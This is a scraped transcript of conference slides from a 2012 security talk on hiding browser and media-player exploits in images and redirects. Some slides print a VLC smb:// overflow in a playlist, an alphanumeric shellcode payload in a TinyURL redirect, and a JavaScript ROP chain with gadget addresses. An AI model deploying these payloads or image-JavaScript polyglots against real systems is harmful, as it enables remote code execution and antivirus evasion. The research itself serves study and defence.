Upload File

b! #$%&’ g(( )(*+ $% · net-square # who am i saumil shah, ceo net-square. • hacker,...

  • Home
  • Documents
  • B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University
32
net-square B G p Saumil Shah DEEP SEC 2012 w

Upload: others

Post on 24-May-2020

1 views

Category:

Documents


0 download

Report

TRANSCRIPT

Page 1: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

B!" #$%&'

$% G(("

)(*+

p!),!&-

Saumil Shah D E E P S E C 2 0 1 2

w.+%

Page 2: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

# who am i

Saumil Shah, CEO Net-Square. •  Hacker, Speaker, Trainer,

Author - 15 yrs in Infosec. •  M.S. Computer Science

Purdue University. •  [email protected] •  LinkedIn: saumilshah •  Twitter: @therealsaumil

Page 3: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

My area of work

Penetration Testing

Reverse Engineering

Exploit Writing

New Research

Offensive Security

Attack Defense

Conference Speaker

Conference Trainer

"Eyes and ears open"

Page 4: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

When two forces combine...

Web Hacking

Binary Exploits

Page 5: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

SNEAKY

LETHAL

Page 6: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

Page 7: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

302 IMG JS HTML5

Page 8: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

Page 9: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

VLC smb overflow

•  smb://[email protected]/foo/#{AAAAAAAA....}

•  Classic Stack Overflow.

Page 10: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

VLC XSPF file <?xml version="1.0" encoding="UTF-8"?> !<playlist version="1" ! xmlns="http://xspf.org/ns/0/" ! xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> ! <title>Playlist</title> ! <trackList> ! <track> ! <location> ! smb://[email protected]/foo/#{AAAAAAAA....} ! </location> ! <extension ! application="http://www.videolan.org/vlc/playlist/0"> ! <vlc:id>0</vlc:id> ! </extension> ! </track> ! </trackList> !</playlist> !

Page 11: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

Alpha Encoded Exploit

Tiny URL

ZOMFG!

Page 12: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

100% Pure Alphanum!

Page 13: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

VLC smb overflow - HTMLized!!

"<embed type="application/x-vlc-plugin" !" "width="320" height="200" !" "target="http://tinyurl.com/ycctrzf" !" "id="vlc" /> !

Page 14: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

301 Redirect from tinyurl

HTTP/1.1 301 Moved Permanently !X-Powered-By: PHP/5.2.12 !Location: smb://[email protected]/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA !AAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1 !JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAA !AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA !AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA !AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA !AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA !AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYII !IIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoL !KPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHk !PfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxH !kEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDn !CUCHPeEPAA} !Content-type: text/html !Content-Length: 0 !Connection: close !Server: TinyURL/1.6 !

Page 15: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

Page 16: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

Exploits as Images - 1

•  Grayscale encoding (0-255). •  1 pixel = 1 character. •  Perfectly valid image.

•  Decode and Execute!

Page 17: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

Page 18: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

I'm an evil Javascript

I'm an innocent image

Page 19: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}var addressof=new Array();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax_esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744;addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ecx_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addressof["call_peax"]=0x6d802597;function call_ntallocatevirtualmemory(baseptr,size,callnum){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);var call_peax_ret=packv(addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);var popad_ret=packv(addressof["popad_ret"]);var retval="" !

<CANVAS>

Page 20: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square See no eval()

Page 21: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

Same Same No Different!

var a = eval(str);

a = (new Function(str))();

Page 22: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

IMAJS

I iz being a Javascript

Page 23: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

IMAJS

<img src="itsatrap.gif">

<script src="itsatrap.gif"> </script>

Page 24: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

IMAJS-GIF Browser Support Height Width Browser/Viewer Image

Renders? Javascript Executes?

2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE no yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera ? ? 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer no - 2f 2a 00 00 Win 7 Preview yes -

Page 25: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

IMAJS-BMP Browser Support Height Width Browser/Viewer Image

Renders? Javascript Executes?

2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE yes yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer yes - 2f 2a 00 00 Win 7 Preview yes -

Page 26: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

The αq Exploit

Page 27: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

Demo

IMAJS αq FTW!

Page 28: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square IMAJS CANVAS "loader" script

Alpha encoded exploit code

Page 29: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

These are not the sploits you're looking for

Page 30: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

No virus threat detected

Page 31: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

The FUTURE?

Page 32: B! #$%&’ G(( )(*+ $% · net-square # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University

net-square

THE END

B!" #$%&'

$% G(("

)(*+

p!),!&-

w.+%

@therealsaumil [email protected]


HTTP Fingerprinting and Advanced Assessment Techniques · HTTP Fingerprinting and Advanced Assessment Techniques Saumil Shah Director, Net-Square Author: ÒWeb Hacking - Attacks and

Defeating Automated Web Assessment Tools by Saumil Shah

Your practice equipment pros since 2001 · Net Examiner Identify the best netting for your ... Impact Net Square Mesh with Secure Knot ... Vertical Drop Lines slide with the net to

SACRAMENTO Q INDUSTRIAL REAL ESTATE...the greatest positive net absorption of 217,649 square feet, and the West Sacramento submarket had the second highest net absorption of 205,271

OQUARE. A SQUaRE-based Quality Evaluation Framework for ...ontolog.cim3.net/file/work/OntologySummit2013/2013-01-31_Ontolo… · OQUARE A SQUaRE-based Quality Evaluation Framework

The Network as the Village Square New Roles and Responsibilities Tim Lance Net@EDU, Tempe February 10, 2008

NET & COURT GAMES 2 Square Bounce SKILL FOCUS

Radiology Dr. Saumil Desai* Associate Professor

The Boulder Group- Net Leased Properties for Sale ... - Zebulon...The lease is absolute triple net and features zero landlord responsibilities. The 14,550 square foot Walgreens is

Mechatronics Project Presentation An Inexpensive Electronic Method for Measuring Takeoff Distances 1 BY: KARL ABDELNOUR ROBERT ECKHARDT SAUMIL PARIKH

DeepSec 2012 Saumil Shah - Bad Things in Good Packages

An Analytical Study of Stress Management in(PAREKH SAUMIL) ROLLNo

Saumil Shah Evolvement of IPRs and its management seminar February 9, 2008 - Ahmedabad

One-Way Hacking: Futility of Firewalls in Web Hacking JD Glaser, Saumil Shah Foundstone Inc

Writing Metasploit Plugins - XConXFocusxcon.xfocus.org/.../Saumil_Shah-Writing_Metasploit_Plugins...Exploit.pdf · Writing Metasploit Plugins from vulnerability to exploit Saumil

Q2 2020 | RICHMOND, VA INDUSTRIAL MARKET REVIEW · a total 117.2 million square feet RBA in 2,804 existing warehouse properties, and a negative net absorption of 102,939 square feet

Application No. 5 - Miami-Dade CountySingle Family homes on 5,000 net square-foot lots). Further north is a large residential area zoned RU-1 (Single Family Homes on 7,000 net square-foot

Saumil Imp

D1T1 Saumil Shah Stegosploit Hacking With Pictures

COMMERCIAL/OFFICE SPACE FOR LEASE 453-463 FAIRALL … · Net Rent: $15.00 psf net T.M.I. $5.89 psf (2017 estimate) AVAILABLE SIZES: 41,866 square feet Bright, open concept ground

DR. SAUMIL GANDHI oligometastatic lung cancer and ways to

Consuntivo 2011 INGLESE The net exhibition area at Vitrum 2011 was 26,727 square meters, 1.34% more than in 2009. Italian exhibitors occupied 18,344 square meters and foreign exhibitors

Hacking with Pictures - Hack.luarchive.hack.lu/2014/hacking_with_pictures.pdf · Hacking with Pictures Saumil Shah Hack.LU 2014 . net-square Introduction @therealsaumil saumilshah

Escaping Captive Portals - cve-searcharchive.hack.lu/2007/saumil_escaping_captive_portals.pdf · Escaping Captive Portals Saumil Shah barcamp @ hack.lu 2007 Luxembourg, October 18

April%2012% ...net-square.com/_assets/April_2012.pdfAs I embarked on my journey to grow Net-Square with Saumil (for the rare few who don’t know him – he is the CEO of Net-Square),

Writing Metasploit Plugins - the-eye.eu - Informatin... · Writing Metasploit Plugins from vulnerability to exploit Saumil Shah ceo, net-square Hack In The Box 2006, Kuala Lumpur

INDUSTRIAL MARKET REPORT · Vacant SF The total of the direct vacant square footage in a building that is being marketed. Net Absorption The net change in occupied square feet from

Writing Exploits with MSF3 - cve-searcharchive.hack.lu/2007/saumil_writing_exploits_msf3_print.pdf · Writing Exploits with MSF3.0 Saumil Shah hack.lu 2007 Luxembourg, October 18

8.3 Surface Areas of Pyramids · 370 Chapter 8 Surface Area and Volume Exercises 6–8 8.3 Lesson Lesson Tutorials Net of a Square Pyramid A square pyramid is a pyramid with a square

DAY 1 - Saumil Shah - Writing it Plugins

MID YEAR REPORT - Union Square€¦ · Fixed Assets (Net) $ 184,316 Total Net Assets $ 3,900,885 LIABILITIES & EQUITY Liabilities Accounts and Grants Payable & Accrued Expenses $

Empire State Development Corporation...Total Square Feet = 87502 net assignable square feet. 2a) If applicable: You may include here a description of any potential space or acreage

Components of 4-stroke Engine Created by:- Prashanth Nair Sawan Makwana Jigar Chauhan Harshil Gohel Saumil Joshi

Making Hair Nets - forest.gen.nzforest.gen.nz/Medieval/articles/hairnets/hairnets2.pdf · Making hair nets are done the same way as ... Either a cylinder based net or a square net

Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg